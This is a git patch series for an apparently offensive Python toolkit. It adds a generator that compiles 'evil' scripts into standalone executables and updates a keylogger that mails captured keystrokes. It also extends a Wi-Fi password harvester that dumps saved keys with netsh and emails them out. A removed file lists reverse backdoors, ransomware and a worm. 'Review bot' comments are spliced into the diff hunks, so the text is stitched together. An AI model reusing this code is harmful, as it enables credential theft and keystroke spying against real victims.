From 097bd08d8eda48b72f89f7b42808c9085fbc3190 Mon Sep 17 00:00:00 2001
From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com>
Date: Wed, 15 Jun 2022 22:12:13 +0530
Subject: [PATCH 1/3] implement class to generate executables fix imports in malwares examples update requirements
---
 .gitignore | 6 ++
 examples/EvilFiles/Malwares/key_logger.py | 2 +-
 .../Malwares/wifi-password-harvester.py | 11 ++-
 examples/EvilFiles/generatorScript.py | 15 ++++
 pyhtools/evil_files/exec_generator.py | 72 +++++++++++++++++++
 .../malwares/keylogger/keylogger.py | 2 -
 pyhtools/evil_files/malwares/utils.py | 5 +-
 .../wireless_password_harvester/harvester.py | 22 +++---
 pyhtools/executable_generator/__init__.py | 0
 pyhtools/executable_generator/generator.py | 50 -------------
 requirements.txt | 13 ++--
 setup.py | 1 +
 12 files changed, 125 insertions(+), 74 deletions(-)
 create mode 100644 examples/EvilFiles/generatorScript.py
 create mode 100644 pyhtools/evil_files/exec_generator.py
 delete mode 100644 pyhtools/executable_generator/__init__.py
 delete mode 100644 pyhtools/executable_generator/generator.py
diff --git a/.gitignore b/.gitignore
index 4906f4c..b56642a 100644
--- a/.gitignore
+++ b/.gitignore
@@ -143,3 +143,9 @@ dmypy.json
 cython_debug/
 # End of https://www.toptal.com/developers/gitignore/api/python
+
+# exectuables
+*.bin
+*.exe
+*.build
+*.dist
\ No newline at end of file
diff --git a/examples/EvilFiles/Malwares/key_logger.py b/examples/EvilFiles/Malwares/key_logger.py
index 35b7f54..5dc61fa 100644
--- a/examples/EvilFiles/Malwares/key_logger.py
+++ b/examples/EvilFiles/Malwares/key_logger.py
@@ -1,4 +1,4 @@
-from pyhtools.evil_files.malwares.keylogger import KeyLogger
+from pyhtools.evil_files.malwares.keylogger.keylogger import KeyLogger
 key_logger = KeyLogger(email='yourgmailaccount', password='yourpassword', interval_in_secs=60)
 key_logger.run()
diff --git a/examples/EvilFiles/Malwares/wifi-password-harvester.py b/examples/EvilFiles/Malwares/wifi-password-harvester.py
index b9b7fbd..33e56e9 100644
--- a/examples/EvilFiles/Malwares/wifi-password-harvester.py
+++ b/examples/EvilFiles/Malwares/wifi-password-harvester.py
@@ -1,4 +1,3 @@
-import imp
 from pyhtools.evil_files.malwares.wireless_password_harvester.harvester import WiFiPasswordHarvester
 # create obj
@@ -9,5 +8,11 @@
 smtp_port=587,
 )
-# start harvester
-harvester.start()
+# retreives only credentials
+credentials = harvester.get_credentials()
+
+# retreives creds and sends mail
+if harvester.start():
+ print("[*] Process Completed.")
+else:
+ print("[!] Process Incomplete, start again!")
\ No newline at end of file
diff --git a/examples/EvilFiles/generatorScript.py b/examples/EvilFiles/generatorScript.py
new file mode 100644
index 0000000..7435e49
--- /dev/null
+++ b/examples/EvilFiles/generatorScript.py
@@ -0,0 +1,15 @@
+from pyhtools.evil_files.exec_generator import (Compilers ,ExecutableGenerator)
+
+exe = ExecutableGenerator(
+ file_path=r'D:\GithubRepos\pyhtools\examples\EvilFiles\Malwares\key_logger.py', # evil program file path
+ output_filename='evil_file', # output filename without extension, adding extension might raise error
+ output_dir='.', # output directory
+ compiler=Compilers.DEFAULT, # compile using DEFAULT, CLANG, MINGW
+ onefile=True, # creates single exe file
+ remove_output=True, # deletes all compiled files and retains only exe
+)
+
+if exe.generate_executable() == 0:
+ print("[*] Process Completed.")
+else:
+ print("[!] Error Occurred")
\ No newline at end of file
diff --git a/pyhtools/evil_files/exec_generator.py b/pyhtools/evil_files/exec_generator.py
new file mode 100644
index 0000000..25b4236
--- /dev/null
+++ b/pyhtools/evil_files/exec_generator.py
@@ -0,0 +1,72 @@
+'''
+module: generator.py
+description: generates evil file executable
+'''
+from subprocess import call
+from os import name as os_name
+from enum import Enum
+
+
+class Compilers(Enum):
+ DEFAULT = 0
+ MINGW = 1
+ CLANG = 2
+
+
+class ExecutableGenerator:
+ '''
+ creates executable
+ '''
+
+ def __init__(self, file_path: str, output_filename: str = None, output_dir: str = None, icon: str = None, compiler: Compilers = Compilers.DEFAULT, onefile: bool = True, remove_output: bool = True,) -> None:
+ # file options
+ self.__file = file_path
+ self.__output_filename = output_filename
+
+ # set options
+ self.__options = {
+ 'onefile': onefile,
+ 'standalone': True,
+ 'onefile': True,
+ 'remove-output': remove_output,
+ 'output-dir': output_dir,
+ }
+
+ # os based options
+ if os_name == 'nt':
+ self.__options['icon'] = icon
+ else:
+ icon = None
+
+ # compiler based options
+ if compiler == Compilers.CLANG:
+ self.__options['clang'] = True
+ elif compiler == Compilers.MINGW:
+ self.__options['mingw'] = True
+
+ def __generate_command(self):
+ command = 'nuitka '
+ for key in self.__options:
+ cmd = ''
+ value = self.__options[key]
+ value_type = type(self.__options[key])
+
+ # generate option
+ if value_type is bool and value:
+ cmd = f'--{key} '
+ elif value_type is str:
+ cmd = f'--{key}="{value}" '
+
+ # add option to command
+ command += cmd
+
+ if self.__output_filename:
+ pass
+
+ # add file name and return
+ command += f'{self.__file}'
+ return command
+
+ def generate_executable(self):
+ command = self.__generate_command()
+ return call(command.split(), shell=True)
diff --git a/pyhtools/evil_files/malwares/keylogger/keylogger.py b/pyhtools/evil_files/malwares/keylogger/keylogger.py
index b9cb6df..a80fe54 100644
--- a/pyhtools/evil_files/malwares/keylogger/keylogger.py
+++ b/pyhtools/evil_files/malwares/keylogger/keylogger.py
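Review bot: In exec_generator.py, `generate_executable` runs `call(command.split(), shell=True)`, which hands the caller-supplied `file_path`, `output_dir` and `icon` to a shell unescaped and splits any path that contains a space; with a list argument and `shell=True`, POSIX also treats only the first element as the command, so the remaining elements become arguments to the shell rather than to `nuitka`. Have `__generate_command` return an argument list and run it without a shell, `return call(['nuitka', *args, self.__file])`, so no quoting is needed. In `__init__` the options dict lists `'onefile'` twice, and the later `'onefile': True` silently overrides the `onefile` parameter. Patches 2/3 and 3/3 further down only change how string options are quoted and leave the `shell=True` call in place.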
@@ -84,7 +84,6 @@ def mail_report(self):
 '''
 self.log_no += 1
- # print(self.logs)
 self.send_mail()
 self.set_subject()
 timer = threading.Timer(self.interval, self.mail_report)
@@ -95,7 +94,6 @@ def run(self):
 '''
 run/start the keylogger.
 '''
- print('[*] Starting logger.')
 key_listener = pynput.keyboard.Listener(on_press=self.log_key)
 with key_listener:
diff --git a/pyhtools/evil_files/malwares/utils.py b/pyhtools/evil_files/malwares/utils.py
index f8056c6..d00e944 100644
--- a/pyhtools/evil_files/malwares/utils.py
+++ b/pyhtools/evil_files/malwares/utils.py
@@ -2,7 +2,7 @@
 import requests
-def send_mail(email: str, receiver_mail: list[str], password: str, message: str, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587) -> bool:
+def send_mail(email: str, receiver_mail: list[str], password: str, message: str, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587, supress_exceptions:bool=True) -> bool:
 '''
 sends mail to specific address/addresses.
 '''
@@ -14,7 +14,8 @@ def send_mail(email: str, receiver_mail: list[str], password: str, message: str,
 server.quit()
 return True
 except smtplib.SMTPException as e:
- print('[-] Exception : ', e)
+ if not supress_exceptions:
+ print('[-] Exception : ', e)
 return False
diff --git a/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py b/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py
index 456bcc9..658ec44 100644
--- a/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py
+++ b/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py
@@ -1,4 +1,5 @@
 from pyhtools.evil_files.malwares.utils import send_mail
+from os import name as os_name
 import subprocess
 import re
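Review bot: In utils.py, the new `supress_exceptions` keyword on `send_mail` does not suppress anything: the `except smtplib.SMTPException` branch swallows the error and returns `False` either way, and the flag only gates the `print`. The name is also misspelled and is now part of the function's signature; a name such as `quiet: bool = True` would describe what it does, and the docstring should state that a failure is reported only through the `False` return. The start of the `try` block lies outside the hunk.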
@@ -34,30 +35,31 @@ def get_username():
 overall_nw_data = f'Subject: Received Credentials from {get_username()} \n'
 ssid_passwds = 'SSID : Password\n'
 for network_name in network_names:
- if 'QuantumRegion' in network_name:
- continue
-
+ # sanitize network name
 network_name = network_name.replace('\r', '')
- command = 'netsh wlan show profile "' + \
- (network_name) + '" key=clear'
- nw_info = subprocess.check_output(command, shell=True).decode()
+ # get password using netsh
+ nw_info = subprocess.check_output(
+ f'netsh wlan show profile "{network_name}" key=clear', shell=True).decode()
 overall_nw_data += nw_info
 passwd_res = re.search(r'(?:Key\sContent\s*:\s)(.*)', nw_info)
- passwd = passwd_res.group(1)
-
+ passwd = None # AP without password security
+ try:
+ passwd = passwd_res.group(1)
+ except AttributeError:
+ pass
 ssid_passwds += f'{network_name} : {passwd}\n'
 overall_nw_data += ssid_passwds
 return overall_nw_data
 def start(self):
+ if os_name != 'nt':
+ raise
 credentials = self.get_credentials()
 if credentials:
 if send_mail(self.email, self.email, self.passwd, credentials, self.smtp_server, self.smtp_port):
- print('[*] Process Completed Successfully')
 return True
 else:
- print('[-] Process Failed.')
 return False
diff --git a/pyhtools/executable_generator/__init__.py b/pyhtools/executable_generator/__init__.py
deleted file mode 100644
index e69de29..0000000
diff --git a/pyhtools/executable_generator/generator.py b/pyhtools/executable_generator/generator.py
deleted file mode 100644
index b2a31c2..0000000
--- a/pyhtools/executable_generator/generator.py
+++ /dev/null
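Review bot: In harvester.py, the bare `raise` added at the top of `start` has no active exception to re-raise, so on a non-Windows host it fails with `RuntimeError: No active exception to re-raise` instead of stating the reason. Raise a named error with a message, for example `raise OSError('this module supports Windows only')`, and document the platform requirement in the method's docstring. The beginning of the method that contains the `netsh` loop lies outside the hunk.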
@@ -1,50 +0,0 @@
-'''
-module: generator.py
-description: generates evil files using specified payload and type
-'''
-from enum import Enum
-# from subprocess import check_call, check_output
-
-
-# TODO: convert all evil files modules into classes
-# create new class object with parameters and generate
-# evil file using specified compiler using subprocess
-
-
-class CompileOptions(Enum):
- PYINTALLER = 0
- NUITKA = 1
-
-
-class Generator:
- def __init__(self, _type: str, payload: str, compiler: CompileOptions = CompileOptions.PYINTALLER, *args, **kwargs) -> None:
- self.__type = _type
- self.__payload = payload
- self.__compiler = compiler
-
- self.__options = {
- 'malwares': [
- 'credential_harvester',
- 'keylogger',
- 'http_reverse_backdoor',
- 'tcp_reverse_backdoor',
- 'telegram_data_harvester',
- 'telegram_remote_code_executor',
- 'wireless_password_harvester'
- ],
- 'ransomwares': [
- 'dmsec',
- ],
- 'worms': [
- 'dir_cloner'
- ],
- }
-
- def verify():
- pass
-
- def show_options():
- pass
-
- def generate_file():
- pass
diff --git a/requirements.txt b/requirements.txt
index b9494c4..121ec2c 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,14 +1,15 @@
 beautifulsoup4>=4.9.3
 colorama>=0.4.4
 #netfilterqueue (for linux devices only): sudo pip3 install --upgrade -U git+https://github.com/kti/python-netfilterqueue
-nuitka
 kamene>=0.32
-scapy>=2.4.5
-psutil>=5.8.0
-prettytable>=2.1.0
-pynput>=1.7.3
+nuitka
 pyfiglet>=0.8.post1
+pynput>=1.7.3
 pytelegrambotapi>=4.0.1
+prettytable>=2.1.0
+psutil>=5.8.0
 pyinstaller
 requests>=2.25.1
-# wmi # for windows process management
\ No newline at end of file
+scapy>=2.4.5
+# wmi # for windows process management
+zstandard
\ No newline at end of file
diff --git a/setup.py b/setup.py
index a727922..88be931 100644
--- a/setup.py
+++ b/setup.py
@@ -32,6 +32,7 @@
 'pytelegrambotapi',
 'pyinstaller',
 'requests',
+ 'zstandard',
 ],
 classifiers=[
 'Development Status :: 4 - Beta',
From bbb478a3371147fd0195fe6f2e5b264b527e03b0 Mon Sep 17 00:00:00 2001
From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com>
Date: Wed, 15 Jun 2022 22:38:53 +0530
Subject: [PATCH 2/3] remove output filename parameter from ExecutableGenerator
---
 .gitignore | 3 ++-
 examples/EvilFiles/generatorScript.py | 20 +++++++++-----------
 pyhtools/evil_files/exec_generator.py | 9 +++------
 3 files changed, 14 insertions(+), 18 deletions(-)
diff --git a/.gitignore b/.gitignore
index b56642a..03153a0 100644
--- a/.gitignore
+++ b/.gitignore
@@ -148,4 +148,5 @@ cython_debug/
 *.bin
 *.exe
 *.build
-*.dist
\ No newline at end of file
+*.dist
+*exectuables*
\ No newline at end of file
diff --git a/examples/EvilFiles/generatorScript.py b/examples/EvilFiles/generatorScript.py
index 7435e49..6fbce68 100644
--- a/examples/EvilFiles/generatorScript.py
+++ b/examples/EvilFiles/generatorScript.py
@@ -1,15 +1,13 @@
-from pyhtools.evil_files.exec_generator import (Compilers ,ExecutableGenerator)
+from pyhtools.evil_files.exec_generator import (Compilers, ExecutableGenerator)
+from os import getcwd
 exe = ExecutableGenerator(
- file_path=r'D:\GithubRepos\pyhtools\examples\EvilFiles\Malwares\key_logger.py', # evil program file path
- output_filename='evil_file', # output filename without extension, adding extension might raise error
- output_dir='.', # output directory
- compiler=Compilers.DEFAULT, # compile using DEFAULT, CLANG, MINGW
- onefile=True, # creates single exe file
- remove_output=True, # deletes all compiled files and retains only exe
+ file_path = r'D:\GithubRepos\pyhtools\examples\EvilFiles\generatorScript.py', # evil program file path
+ output_filename = 'evil_file', # output filename without extension, adding extension might raise error
+ output_dir = getcwd(), # output directory
+ compiler = Compilers.DEFAULT, # compile using DEFAULT, CLANG, MINGW
+ onefile = True, # creates single exe file
+ remove_output = True, # deletes all compiled files and retains only exe
 )
-if exe.generate_executable() == 0:
- print("[*] Process Completed.")
-else:
- print("[!] Error Occurred")
\ No newline at end of file
+return_code = exe.generate_executable()
\ No newline at end of file
diff --git a/pyhtools/evil_files/exec_generator.py b/pyhtools/evil_files/exec_generator.py
index 25b4236..ff55915 100644
--- a/pyhtools/evil_files/exec_generator.py
+++ b/pyhtools/evil_files/exec_generator.py
@@ -18,10 +18,9 @@ class ExecutableGenerator:
 creates executable
 '''
- def __init__(self, file_path: str, output_filename: str = None, output_dir: str = None, icon: str = None, compiler: Compilers = Compilers.DEFAULT, onefile: bool = True, remove_output: bool = True,) -> None:
+ def __init__(self, file_path: str, output_dir: str = None, icon: str = None, compiler: Compilers = Compilers.DEFAULT, onefile: bool = True, remove_output: bool = True,) -> None:
 # file options
 self.__file = file_path
- self.__output_filename = output_filename
 # set options
 self.__options = {
@@ -55,13 +54,10 @@ def __generate_command(self):
 if value_type is bool and value:
 cmd = f'--{key} '
 elif value_type is str:
- cmd = f'--{key}="{value}" '
+ cmd = f'--{key} "{value}" '
 # add option to command
 command += cmd
-
- if self.__output_filename:
- pass
 # add file name and return
 command += f'{self.__file}'
@@ -69,4 +65,5 @@ def __generate_command(self):
 def generate_executable(self):
 command = self.__generate_command()
+ print(command)
 return call(command.split(), shell=True)
From aa197054590264a32c9427d4ebd9818aa5d66087 Mon Sep 17 00:00:00 2001
From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com>
Date: Wed, 15 Jun 2022 22:51:44 +0530
Subject: [PATCH 3/3] remove output directory options
---
 examples/EvilFiles/generatorScript.py | 5 ++---
 pyhtools/evil_files/exec_generator.py | 3 +--
 2 files changed, 3 insertions(+), 5 deletions(-)
diff --git a/examples/EvilFiles/generatorScript.py b/examples/EvilFiles/generatorScript.py
index 6fbce68..4d4a892 100644
--- a/examples/EvilFiles/generatorScript.py
+++ b/examples/EvilFiles/generatorScript.py
@@ -2,9 +2,8 @@
 from os import getcwd
 exe = ExecutableGenerator(
- file_path = r'D:\GithubRepos\pyhtools\examples\EvilFiles\generatorScript.py', # evil program file path
- output_filename = 'evil_file', # output filename without extension, adding extension might raise error
- output_dir = getcwd(), # output directory
+ file_path = r'D:\GithubRepos\pyhtools\examples\EvilFiles\Malwares\key_logger.py', # evil program file path
+ output_dir = '.', # output directory
 compiler = Compilers.DEFAULT, # compile using DEFAULT, CLANG, MINGW
 onefile = True, # creates single exe file
 remove_output = True, # deletes all compiled files and retains only exe
diff --git a/pyhtools/evil_files/exec_generator.py b/pyhtools/evil_files/exec_generator.py
index ff55915..85698ab 100644
--- a/pyhtools/evil_files/exec_generator.py
+++ b/pyhtools/evil_files/exec_generator.py
@@ -54,7 +54,7 @@ def __generate_command(self):
 if value_type is bool and value:
 cmd = f'--{key} '
 elif value_type is str:
- cmd = f'--{key} "{value}" '
+ cmd = f'--{key}={value} '
 # add option to command
 command += cmd
@@ -65,5 +65,4 @@ def __generate_command(self):
 def generate_executable(self):
 command = self.__generate_command()
- print(command)
 return call(command.split(), shell=True)